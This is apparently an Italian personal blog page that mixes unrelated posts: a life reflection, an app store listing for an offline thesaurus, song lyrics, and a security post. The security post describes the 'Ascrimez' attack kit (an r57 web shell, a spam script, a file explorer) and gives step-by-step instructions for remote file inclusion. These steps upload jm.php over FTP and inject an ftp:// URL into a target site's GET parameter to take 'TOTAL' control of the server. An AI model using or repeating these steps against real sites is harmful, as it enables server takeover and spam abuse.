Non è mica facile stare alla guida dell'autobus della propria vita. Deviare la strada all'ultimo momento. Prendere una trazzera col pericolo che diventi troppo stretta per poterci passare. Fermarsi. Osservare. Far scendere i passeggeri. Non è facile. Non è facile capire se quella scelta è quella giusta. Capita di dover far scender qualcuno. Magari quel qualcuno non capisce nè perchè nè per come. Però tu sai. Tu hai visto che davanti a lui s'era aperta l'autobahn. E lo lasci andare. Poi scopri che è andata come pensavi. Perchè lui ora è felice. E tu lo sapevi. Saper guidare non significa non aver mai incidenti. E io non guido piano e me le cerco.

TheSaurus

di Lucia Intelisano

L'applicazione TheSaurus contiene un dizionario dei sinonimi e contrari da poter utilizzare senza connettersi ad internet, ovvero in modalità offline. Offre un'interfaccia semplice ed intuitiva per trovare sinonimi e contrari sia di semplici parole che di modi di dire.

Provala adesso!

• Gratis
• Categoria: Intrattenimento
• Pubblicato: 01/06/2010
• Versione: 1.0
• 2.9 MB
• Lingua: Italiano
• Venditore: Lucia Intelisano
• © Lucia Intelisano

Requisiti: Compatibile con iPhone, iPod touch e iPad. Richiede l'OS iPhone v. 3.1 o successive.

Le novità sulla sicurezza informatica non finiscono mai. Crescono di pari passo con l'avanzamento delle tecnologie. Ultimamente, ho avuto a che fare con un probabile bug proveniente da una feature aggiunta al comportamento di una funzione php: il file_exists. Nella versione 4 di php, permetteva di effettuare un controllo sui file presenti nel server in cui gira il codice. A partire dalla versione 5, gli si può passare un indirizzo ftp, restituendo sempre true. E fin qui. Ma, se per caso, utilizzaste questa funzione per caricare dei contenuti dinamicamente sul sito, passati da una GET o da un POST e avete il parametro allow_url_open settato a 1 nel php.ini, allora preparatevi ad un bell'attacco. L'attacco in questione proviene da un kit chiamato "Ascrimez". Si tratta di un insieme di 4 files che comprendono:

• una shell r57 modificata
• uno spam bot
• un file explorer
• una notifica per eventuali server vulnerabili

La shell r57

E' già nota agli studiosi di sicurezza informatica. Comunemente usata da ragazzi ed hackers occasionali. Lo script è scritto in php e contiene circa 2000 righe di codice. Caratteristiche principali sono:

• invio di email
• visualizzazione di file
• ricerca di file
• gestione di un db interno
• botnet features
• zip/unzip di files
• esecuzione di codice php, query sql, codice C, script
• supportato server locale e remoto

La shell è stata creata in Russia.

Spam script

Il kit contiene anche un file per spammare email (jamaican.php). L'interfaccia è in portoghese.

File explorer

jm.php è il file che può essere utlizzato per visualizzare i file remoti, uploadare, downloadare file, rinominarli, cambiare loro i permessi.

Per mettere a punto l'attacco, bisogna seguire i seguenti passi.

1. scaricare il kit qui
   
2. crearsi uno spazio in un host che permetta l'accesso via ftp (ad esempio lycos, altervista etc)
3. uploadare in tale spazio il file jm.php
4. creare la seguente stringa "ftp://username:password@dominio/jm.php?http://www.jak.com/manual/CVS/.../rhe.ganteng?&chdir=nomedirectorydovesivoglionocambiareipermessi
5. verificare se il sito da attaccare passi delle variabili in GET
   
6. mettere al posto della variabile la stringa precedentemente creata
7. ad esempio http://www.pincopallo.com/?nomevariabile=stringa

et voilà!

Avrete il server a vostra TOTALE disposizione!
Un sentito grazie agli amici russi e brasiliani.

Non vi resta che divertirvi un pò a testare la sicurezza dei vostri server.
Enjoy!

La canto per te, solo per te.
Avrei voluto tanto averti davanti, occhi negli occhi.
Ma destìn mai fu più spietato.


Baciami per domani
baciami per più tardi
per tutti quei momenti
in cui non siamo insieme.
Lascia che mi ricordi
sempre dei tuoi sorrisi
adesso approfittiamo
e non pensiamo a niente
Perchè domani o chissà quando
le cose potrebbero cambiare
e i baci che tu non mi darai
li voglio adesso
Baciami per domani
dammeli per più tardi
quegli attimi d'amore
per quando non ti vedo,
amore...
Perchè domani o chissà quando
le cose potrebbero cambiare
e i baci che tu non mi darai
li voglio adesso